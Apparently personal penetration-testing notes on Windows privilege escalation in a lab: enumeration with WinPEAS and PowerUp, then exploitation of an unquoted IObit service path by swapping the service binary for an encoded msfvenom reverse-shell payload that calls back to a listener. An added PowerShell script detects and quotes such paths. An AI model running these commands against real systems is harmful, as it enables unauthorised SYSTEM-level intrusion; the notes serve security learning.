Windows Priv esc

Living off the land: GTFOBins equivalent for Windows (LOLBAS)

Enumeration with Winpeas

wget -O winPEASx86.exe "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/a17f91745cafc5fa43a428d766294190c0ff70a1/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe?raw=true"

(the plain blob URL returns the HTML page rather than the binary; ?raw=true makes GitHub redirect to the raw file and -O keeps the filename clean)

Enumeration with powerup.ps1

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

Upload the script through the Meterpreter session

upload /root/PowerSploit/Privesc/PowerUp.ps1

Now run the script with PowerShell (dot-source it so its functions are loaded into the session)

load powershell
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks

The Iobit AdvancedSystemCareService9 service is vulnerable to path hijack. No quotes are being used to enclose the path.

Unquoted service path vulnerability; the reported path is

C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
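As an added example (not part of these notes), a PowerShell script that performs the same unquoted-path check PowerUp reported above and, optionally, quotes the ImagePath in the registry as the remediation; the function names are my own, and the script assumes an elevated PowerShell 5.1 or later session on Windows:

```powershell
# Added example, not from the original notes: find services whose ImagePath is
# unquoted and contains a space (the condition PowerUp flags), then optionally
# quote the path in the registry so the hijack opportunity goes away.
# Assumes an elevated session; Set-ItemProperty on HKLM needs admin rights.

function Get-UnquotedServicePath {
    # Returns one object per service whose executable path is unquoted and contains a space.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if ([string]::IsNullOrWhiteSpace($path)) { return }
        # A path that already starts with a quote is not affected.
        if ($path.TrimStart().StartsWith('"')) { return }
        # Strip trailing arguments: keep everything up to and including the first ".exe".
        $m = [regex]::Match($path, '^(.+?\.exe)', 'IgnoreCase')
        $exe = if ($m.Success) { $m.Groups[1].Value } else { $path }
        if ($exe -notmatch '\s') { return }
        [pscustomobject]@{
            Name       = $_.Name
            StartName  = $_.StartName   # account the service runs as, e.g. LocalSystem
            Executable = $exe
            ImagePath  = $path
        }
    }
}

function Repair-UnquotedServicePath {
    # Rewrites ImagePath as "<exe>" <args> for every finding. Supports -WhatIf.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    foreach ($svc in Get-UnquotedServicePath) {
        $rest  = $svc.ImagePath.Substring($svc.Executable.Length)   # original arguments, if any
        $fixed = '"' + $svc.Executable + '"' + $rest
        $key   = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
        if ($PSCmdlet.ShouldProcess($svc.Name, "Set ImagePath to $fixed")) {
            Set-ItemProperty -Path $key -Name ImagePath -Value $fixed
        }
    }
}

# Report first, then preview the fix; drop -WhatIf to apply it.
Get-UnquotedServicePath | Format-Table Name, StartName, Executable -AutoSize
Repair-UnquotedServicePath -WhatIf
```

On the host described in these notes, the IObit path above would appear in the report with StartName showing the account the service runs as.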

Now create a reverse shell payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.3.221 LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe

A reverse Meterpreter payload dies if used here (the Service Control Manager kills a service process that does not respond to it in time), so it would have to be chained with post/windows/manage/migrate; a plain shell payload is used instead.

Now upload the payload, drop from Meterpreter into a command shell, stop the service, copy the file over the service binary at the same location (keep a copy of the original so the service can be restored afterwards), start a listener on port 4443 and start the service again.

upload ASCService.exe
shell
sc stop AdvancedSystemCareService9
copy ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9

and we get the reverse shell on the listener

Windows compiled exploits
